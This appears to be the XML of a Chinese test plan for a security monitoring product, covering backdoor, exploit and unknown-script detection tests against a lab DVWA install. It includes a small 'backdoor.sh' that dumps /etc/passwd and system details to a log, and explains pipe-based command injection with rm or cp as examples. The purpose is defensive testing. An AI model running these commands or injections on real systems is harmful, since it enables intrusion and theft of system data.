                              <w:t>bin/bash</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="6F9FAE8C" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:r>
                              <w:t>#backdoor.sh</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5BF82FDD" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:r>
                              <w:t>#this is test attack script</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="5B5106A1" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>echo</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> `date` &gt;&gt; /tmp/attack.log </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4E78240E" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>echo</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> `uname -a` &gt;&gt; /tmp/attack.log</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="720C178E" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>cat</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> /etc/passwd &gt;&gt; /tmp/attack.log</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="54F0A70F" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C">
                            <w:proofErr w:type="gramStart"/>
                            <w:r>
                              <w:t>echo</w:t>
                            </w:r>
                            <w:proofErr w:type="gramEnd"/>
                            <w:r>
                              <w:t xml:space="preserve"> ‘================’ &gt;&gt; /tmp/attack.log</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2F45C9AF" w14:textId="77777777" w:rsidR="00A5661A" w:rsidRDefault="00A5661A" w:rsidP="00C55A9C"/>
                        </w:txbxContent>
                      </v:textbox>
                    </v:shape>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>模拟攻击脚本：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7D224B02" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="27A48DF4" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6EE697CA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1F5A0B88" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="29D17CE1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="747"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="304C651D"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23" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DCFD955"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WebUI</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>或微信告警系统</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中出现告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="1F57D4A1" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="473"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1536" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="64B085E6"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23" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="630DB14D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0784EF6C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11E1A7ED" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="297" w:name="_Toc2110711278"/>
      <w:bookmarkStart w:id="298" w:name="_Toc36487930"/>
      <w:r w:rsidRPr="00536672">
        <w:t>漏洞攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="297"/>
      <w:bookmarkEnd w:id="298"/>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73B452D8" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="18F3F096"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61617AE3" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>漏洞利用攻击检测</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="47286A78" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67DB1663" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AF6BFC9" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>使用默认安装DVWA作为模拟漏洞服务，以期作为攻击目标进行漏洞利用攻击</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>测试</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="4B2FFE70" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="74895F5F"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551CC149" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户行为分析各组件安全完毕，实时检测数据流正常</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="6F2DCE4F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B40DE44"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529B866F" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>概述：漏洞攻击属于常规攻防手段中</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>最</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>核心的手段之一了，其利用手法和危害结果因不同的漏洞而不同，不同于暴力破解攻击的简单，经济</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>缺有效</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>的性质（大多只能对非专业目标或疏忽大意的对象产生效果），漏洞利用攻击常常应对的目标是有价值对象或普遍的互联网用户，互联网上各种重大影响的攻击事件的核心往往源于此处。就今年热点事件</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>”</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>warncry“勒索病毒的大规模扩散就是基于一个window的0day漏洞引发。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33811EDA" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>漏洞攻击往往基于挖掘出的各类漏洞，发送精心构造的输入数据进而触发漏洞，而引发的结果可能有数据泄露，任意代码/命令执行，拒绝服务等。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B895274" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>其中危害最大的一类攻击应该属于任意命令执行，通过触发漏洞实现远程执行任意命令进而窃取到系统的相关权限。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5E2D345C" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="073E8FF5" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>具体测试过程：在被保护机器上部署含有漏洞的服务（DVWA），之后通过漏洞服务基于远程任意命令行漏洞进行攻击。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06255804" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>调整dvwa安全级别，设置成low以确保漏洞能够简单利用</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61AE32CB"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drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="3950CBC6" wp14:editId="6BA631F6">
                  <wp:extent cx="4104005" cy="1359535"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="12065"/>
                  <wp:docPr id="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37"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="1359535"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="72DF8F6D" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-b"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="299" w:name="_Toc794349060"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>安全级别设置</w:t>
            </w:r>
            <w:bookmarkEnd w:id="299"/>
          </w:p>
          <w:p w14:paraId="058E4834" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="008040BD">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="22"/>
              </w:numPr>
              <w:adjustRightInd/>
              <w:snapToGrid/>
              <w:spacing w:after="0" w:line="400" w:lineRule="exact"/>
              <w:ind w:firstLineChars="200" w:firstLine="360"/>
              <w:jc w:val="both"/>
              <w:textAlignment w:val="auto"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>利用其中的</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>命令行任意执行漏洞</w:t>
            </w:r>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>进行攻击，如下测试攻击</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3E74B341"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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="61D78BB3" wp14:editId="25172A12">
                  <wp:extent cx="4104005" cy="2581910"/>
                  <wp:effectExtent l="0" t="0" r="10795" b="889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38"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4104005" cy="2581910"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:noFill/>
                          <a:ln w="9525">
                            <a:noFill/>
                            <a:miter/>
                          </a:ln>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E0D9F94" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-b"/>
              <w:spacing w:before="312" w:after="312"/>
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="300" w:name="_Toc1897129244"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>任意命令行漏洞测试攻击</w:t>
            </w:r>
            <w:bookmarkEnd w:id="300"/>
          </w:p>
          <w:p w14:paraId="0BAFB7E0" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>上述的abc为无效的操作指令，替换成其他任意的字符串都行，“|”后面的字符串命令则是对应的攻击指令，可以替换成对应任意的攻击指令，如ls，rm，cp等（需要相应的权限）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="152DA1DE" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B50A6E8"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701FF602"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hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>WebUI</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>或微信告警系统</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:cs="微软雅黑" w:hint="eastAsia"/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:kern w:val="2"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>中出现告警</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="45406D7F" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12A76DEF"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3C312AB6" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
                <w:i/>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="53B571C2" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="0020259A" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-0"/>
        <w:ind w:firstLine="360"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DA0A65" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="00536672" w:rsidRDefault="00C55A9C" w:rsidP="00C55A9C">
      <w:pPr>
        <w:pStyle w:val="8lab-3"/>
      </w:pPr>
      <w:bookmarkStart w:id="301" w:name="_Toc1604140877"/>
      <w:bookmarkStart w:id="302" w:name="_Toc36487931"/>
      <w:r w:rsidRPr="00536672">
        <w:t>未知软件/行为/脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="301"/>
      <w:bookmarkEnd w:id="302"/>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18F69028" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="296"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31CDCC9D"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3F2F69B1" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>未知软件/行为/脚本</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="3C80031C" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="460514BD" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>测试工具</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6833" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4BF97811" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>使用提供的测试脚本作为未知脚本进行测试（在后门测试中提供）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C55A9C" w:rsidRPr="003914A3" w14:paraId="70B19F77" w14:textId="77777777" w:rsidTr="00A5661A">
        <w:trPr>
          <w:trHeight w:val="172"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1526" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16042855"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388C1295" w14:textId="77777777" w:rsidR="00C55A9C" w:rsidRPr="003914A3" w:rsidRDefault="00C55A9C" w:rsidP="00A5661A">
            <w:pPr>
              <w:pStyle w:val="8lab-0"/>
              <w:ind w:firstLine="360"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003914A3">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>用户行为分析各组件安全完毕，实时检测数据流正常</w:t>
            </w:r>
